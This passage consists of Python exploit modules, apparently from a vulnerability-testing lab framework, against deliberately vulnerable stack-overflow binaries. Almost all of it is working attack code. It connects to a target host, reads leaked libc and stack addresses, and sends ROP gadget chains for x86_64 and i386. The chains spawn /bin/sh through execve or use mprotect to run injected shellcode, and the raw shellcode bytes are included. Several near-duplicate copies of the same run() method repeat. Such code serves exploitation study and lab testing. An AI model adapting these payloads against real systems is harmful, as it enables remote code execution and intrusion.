libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) # get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] pop_ret5_offset = self.property['ret5'] - libc.symbols['system'] # get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset # get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset # pop_ret5_addr =pop_ret4_addr - 2 # set payload payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64( pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64( self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = {'ret1': 0x0000000000401696, # gadget address in libc 'ret2': 0x00000000004264af, 'ret3': 0x00000000004c26e8, 'ret4': 0x0000000000442fe9, 'ret5': 0x0000000000467685, 'data1': 0x000000000000003b, # execv systemcall number 'data2': 0x0000000000000000, 'data3': 0x0000000000000000, 'offset': 24, # offset 'sysaddress': 0x0} # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') # get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) # get ret address pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pop_ret5_addr = self.property['ret5'] # set payload payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64( pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64( self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() elif self.options['architecture'] == 'i386': if self.options['static'] == 'False': s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret 'ret2': 0x0002c5dc, # : xor eax, eax ; ret 'ret3': 0x00023f97, # : pop eax ; ret 'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret 'ret5': 0x00002c87, # : int 0x80 'data1': 0x0000000b, # execv systemcall number 'data2': 0x00000000, 'data3': 0x00000000, 'offset': 26, # offset 'sysaddress': 0x0} # system function address, initialize 0 # get new sysaddress here s.send("a") # any string recv_data = s.recv(8) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib32/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) # get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] pop_ret5_offset = self.property['ret5'] - libc.symbols['system'] # get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset # get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset # pop_ret5_addr =pop_ret4_addr - 2 # set payload payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32( pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32( self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = {'ret1': 0x080481d1, # : pop ebx ; ret 'ret2': 0x080494e3, # : xor eax, eax ; ret 'ret3': 0x080b95b6, # : pop eax ; ret 'ret4': 0x080e0859, # : pop ecx ; ret 'ret5': 0x0807079a, # : pop edx ; ret 'ret6': 0x0806e127, # : int 0x80 'data1': 0x0000000b, # execv systemcall number 'data2': 0x00000000, 'data3': 0x00000000, 'offset': 22, # offset 'sysaddress': 0x0} # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic32' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/code_reuse32_static') # get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) # get ret address pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pop_ret5_addr = self.property['ret5'] pop_ret6_addr = self.property['ret6'] # set payload payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32( pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32( self.property['data2']) + p32(pop_ret5_addr) + p32(self.property['data3']) + p32(pop_ret6_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: print 'Unrecognized architecture, stop.' return
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send('a') recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data,16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) rbpvalue= int(recv_data1,16) print "rbpvalue = " + hex(rbpvalue) #get shellcode address self.property['shellcodeaddress'] = rbpvalue + 96 #get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['ret3'] pagenum=self.property['data2'] * 3 print pagenum #print helloworld shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01" shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83" shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48" shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05" shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c" shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" #shell shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05" #set payload rop shut off dep payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload print "\n##########sending payload to shut off dep ##########\n" s.send(payload) s.close() else: print 'no exit static'
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send("a") #any string recv_data = s.recv(8) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib32/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get /bin/sh offset binsh_addr_offset = next( libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] pop_ret5_offset = self.property['ret5'] - libc.symbols['system'] #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset #pop_ret5_addr =pop_ret4_addr - 2 #set payload payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32( binsh_addr) + p32(pop_ret2_addr) + p32(pop_ret3_addr) + p32( self.property['data1']) + p32(pop_ret4_addr) + p32( self.property['data2']) + p32( self.property['data3']) + p32(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = { 'ret1': 0x0000000000401696, # gadget address in libc 'ret2': 0x00000000004264af, 'ret3': 0x00000000004c26e8, 'ret4': 0x0000000000442fe9, 'ret5': 0x0000000000467685, 'data1': 0x000000000000003b, #execv systemcall number 'data2': 0x0000000000000000, 'data3': 0x0000000000000000, 'offset': 24, # offset 'sysaddress': 0x0 } # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') #get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get ret address pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pop_ret5_addr = self.property['ret5'] #set payload payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64( binsh_addr) + p64(pop_ret2_addr) + p64(pop_ret3_addr) + p64( self.property['data1']) + p64(pop_ret4_addr) + p64( self.property['data2']) + p64( self.property['data3']) + p64(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close()
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send('a') recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) rbpvalue = int(recv_data1, 16) print "rbpvalue = " + hex(rbpvalue) #get shellcode address self.property['shellcodeaddress'] = rbpvalue + 112 #get /bin/sh offset binsh_addr_offset = next( libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pagenum = self.property['data2'] * 3 print pagenum #print helloworld shellcode = "\xeb\x1e\x5e\x48\x31\xc0\xb0\x01" shellcode += "\x48\x89\xc7\x48\x89\xfa\x48\x83" shellcode += "\xc2\x0e\x0f\x05\x48\x31\xc0\x48" shellcode += "\x83\xc0\x3c\x48\x31\xff\x0f\x05" shellcode += "\xe8\xdd\xff\xff\xff\x48\x65\x6c" shellcode += "\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" #shell shellcode = "\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05" #set payload rop shut off dep payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64( self.property['pageaddress']) + p64(pop_ret2_addr) + p64( self.property['data1'] ) + p64(pagenum) + p64(pop_ret3_addr) + p64( self.property['data3']) + p64(pop_ret4_addr) + p64( self.property['shellcodeaddress']) + p64( binsh_addr) + p64(self.property['data4']) + p64( self.property['data5']) + p64( self.property['data5']) + self.payload print "\n##########sending payload to shut off dep ##########\n" s.send(payload) s.close() else: self.property = { 'ret1': 0x0000000000401696, #gadget address 'ret2': 0x0000000000442fe9, 'ret3': 0x00000000004c26e8, 'ret4': 0x0000000000467685, 'pageaddress': 0x7fffffffd000, 'shellcodeaddress': 0x0, #shellcode address in stack 'data1': 0x0000000000000007, # PROT_EXEC The memory can be executed. 'data2': 0x0000000000001000, # 4096 pagesize 'data3': 0x000000000000000a, #mprotect systemcall number, mprotect() changes protection for the calling process's memory page(s) 'data4': 0x000000000000003b, #execv systemcall number 'data5': 0x0000000000000000, 'offset': 24, # offset 'sysaddress': 0x0 } # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF( '../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe') #get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) rbpvalue = int(recv_data1, 16) print "rbpvalue = " + hex(rbpvalue) #get shellcode address self.property['shellcodeaddress'] = rbpvalue + 112 #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get ret offset pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pagenum = self.property['data2'] * 3 print pagenum #print helloworld shellcode = "\xeb\x1e\x5e\x48\x31\xc0\xb0\x01" shellcode += "\x48\x89\xc7\x48\x89\xfa\x48\x83" shellcode += "\xc2\x0e\x0f\x05\x48\x31\xc0\x48" shellcode += "\x83\xc0\x3c\x48\x31\xff\x0f\x05" shellcode += "\xe8\xdd\xff\xff\xff\x48\x65\x6c" shellcode += "\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" #shell #shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05" #set payload rop shut off dep payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64( self.property['pageaddress']) + p64(pop_ret2_addr) + p64( self.property['data1'] ) + p64(pagenum) + p64(pop_ret3_addr) + p64( self.property['data3']) + p64(pop_ret4_addr) + p64( self.property['shellcodeaddress']) + p64( binsh_addr) + p64(self.property['data4']) + p64( self.property['data5']) + p64( self.property['data5']) + shellcode print "\n##########sending payload to shut off dep ##########\n" s.send(payload) s.close()